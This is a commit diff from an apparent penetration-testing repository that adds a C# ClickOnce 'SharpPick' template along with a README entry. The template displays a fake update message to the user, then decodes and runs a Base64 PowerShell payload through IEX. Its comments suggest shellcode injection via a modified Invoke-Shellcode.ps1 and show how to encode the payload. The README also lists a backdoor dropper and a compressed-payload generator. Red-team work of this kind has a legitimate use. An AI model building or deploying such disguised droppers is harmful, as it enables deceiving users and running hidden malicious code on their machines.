mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 02:21:36 +01:00
Added ClickOnce SharpPick template.
This commit is contained in:
parent
cc5ba84532
commit
c52a66f3c9
@ -4,6 +4,8 @@
|
|||||||
|
|
||||||
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
|
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
|
||||||
|
|
||||||
|
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
|
||||||
|
|
||||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
||||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
||||||
|
|
||||||
|
69
social-engineering/clickOnceSharpPickTemplate.cs
Normal file
69
social-engineering/clickOnceSharpPickTemplate.cs
Normal file
@ -0,0 +1,69 @@
|
|||||||
|
using System;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Linq;
|
||||||
|
using System.Text;
|
||||||
|
using System.IO;
|
||||||
|
using System.Resources;
|
||||||
|
using System.Net;
|
||||||
|
|
||||||
|
using System.Collections.ObjectModel;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Use NuGet to install System.Management.Automation reference.
|
||||||
|
//
|
||||||
|
using System.Management.Automation;
|
||||||
|
using System.Management.Automation.Runspaces;
|
||||||
|
|
||||||
|
namespace ConsoleApplication2
|
||||||
|
{
|
||||||
|
class Program
|
||||||
|
{
|
||||||
|
//
|
||||||
|
// This function and concept comes from PowerPick / SharpPick project by Sixdub:
|
||||||
|
// https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
|
||||||
|
//
|
||||||
|
static string RunPS(string cmd)
|
||||||
|
{
|
||||||
|
// Init stuff
|
||||||
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
|
runspace.Open();
|
||||||
|
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
|
||||||
|
Pipeline pipeline = runspace.CreatePipeline();
|
||||||
|
|
||||||
|
// Add commands
|
||||||
|
pipeline.Commands.AddScript(cmd);
|
||||||
|
|
||||||
|
// Prep PS for string output and invoke
|
||||||
|
pipeline.Commands.Add("Out-String");
|
||||||
|
Collection<PSObject> results = pipeline.Invoke();
|
||||||
|
runspace.Close();
|
||||||
|
|
||||||
|
// Convert records to strings
|
||||||
|
StringBuilder stringBuilder = new StringBuilder();
|
||||||
|
foreach (PSObject obj in results)
|
||||||
|
{
|
||||||
|
stringBuilder.Append(obj);
|
||||||
|
}
|
||||||
|
return stringBuilder.ToString().Trim();
|
||||||
|
}
|
||||||
|
|
||||||
|
static void Main()
|
||||||
|
{
|
||||||
|
Console.WriteLine("Updating ClickOnce application. Please wait...");
|
||||||
|
|
||||||
|
//
|
||||||
|
// Here comes your Base64 encoded Powershell payload.
|
||||||
|
// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
|
||||||
|
// that will spawn a process and insert there some shellcode.
|
||||||
|
// You can prepare Base64 UTF8 shellcode via:
|
||||||
|
// PS> $text = Get-Content yourShellcode.ps1
|
||||||
|
// PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
|
||||||
|
// PS> $encoded = [Convert]::ToBase64String($bytes);
|
||||||
|
// PS> $encoded | Out-File "myEncodedShellcode.ps1"
|
||||||
|
//
|
||||||
|
String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
|
||||||
|
|
||||||
|
RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user